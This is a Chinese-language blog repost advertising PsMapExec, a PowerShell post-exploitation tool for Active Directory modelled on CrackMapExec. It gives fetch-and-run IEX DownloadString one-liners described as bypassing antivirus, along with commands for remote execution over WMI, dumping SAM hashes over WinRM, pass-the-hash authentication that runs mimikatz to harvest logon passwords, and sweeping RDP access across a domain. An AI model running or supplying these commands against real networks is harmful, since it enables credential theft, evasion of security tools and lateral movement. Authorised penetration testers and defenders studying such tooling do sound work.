神器!Powershell版CrackMapExec

admin 2023年9月22日12:41:30评论105 views字数 1862阅读6分12秒阅读模式
 

什么是PsMapExec

PsMapExec是深受CrackMapExec启发而用Powershell编写的一个后渗透利用工具,可用于评估和测试Active Directory环境。

 

支持哪些方法

当前支持的方法(协议)

PsExecRDPSMB SigningWinRMWMI

计划方法

MSSQL (测试中)IPMISNMPFTPSSH
快速开始

将脚本直接加载到内存中(绕过 AV)
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

将脚本直接加载到内存中

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
检查所有域系统上的SMB签名
PsMapExec -Targets All -GenRelayList
通过WMI执行一些命令
PsMapExec -Targets Servers -Username Admin -Password Pass -Method WMI -Command "net user"

神器!Powershell版CrackMapExec

通过WinRM转储SAM并解析结果

PsMapExec -Targets Servers -Username Admin -Password Pass -Method WinRM -Module SAM -Option Parse
神器!Powershell版CrackMapExec

 

使用哈希通过WMI进行身份验证并执行mimikatz

PsMapExec -Targets Workstations -Username Admin -Hash [Hash] -Method WMI -Module LogonPasswords -Option Parse -ShowOutput
神器!Powershell版CrackMapExec

检查所有系统上的RDP访问

PsMapExec -Targets All -Username Admin -Password Pass -Method RDP
神器!Powershell版CrackMapExec
依赖关系

PsMapExec 有一些依赖项,需要从脚本本身外部提取才能运行,主要是:
Kirby(基于PowerShell的Kerberos票证转储)Invoke-Pandemonium(稍作修改的Mimikatz)
目前它们是从单独的GitHub存储库中提取的,如果您在没有外部访问权限的环境中工作或者GitHub被防火墙阻止,您将需要将存储库中的脚本克隆到运行PsMapExec的系统上。
https://github.com/The-Viper-One/PME-Scripts

PsMapExec当前不为这些托管HTTP服务器,因此您需要使用HFS之类的东西:https://www.rejetto.com/hfs/?f=dl,支持指向本地或替代托管服务器来获取脚本依赖项。

PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
神器!Powershell版CrackMapExec
详细使用方法

https://viperone.gitbook.io/pentest-everything/psmapexechttps://viperone.gitbook.io/pentest-everything/psmapexec/using-credentialshttps://viperone.gitbook.io/pentest-everything/psmapexec/methodshttps://viperone.gitbook.io/pentest-everything/psmapexec/moduleshttps://viperone.gitbook.io/pentest-everything/psmapexec/spray
下载地址

https://github.com/The-Viper-One/PsMapExec

原文始发于微信公众号(Hack分享吧):神器!Powershell版CrackMapExec

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月22日12:41:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   神器!Powershell版CrackMapExechttps://cn-sec.com/archives/2058215.html

发表评论

匿名网友 填写信息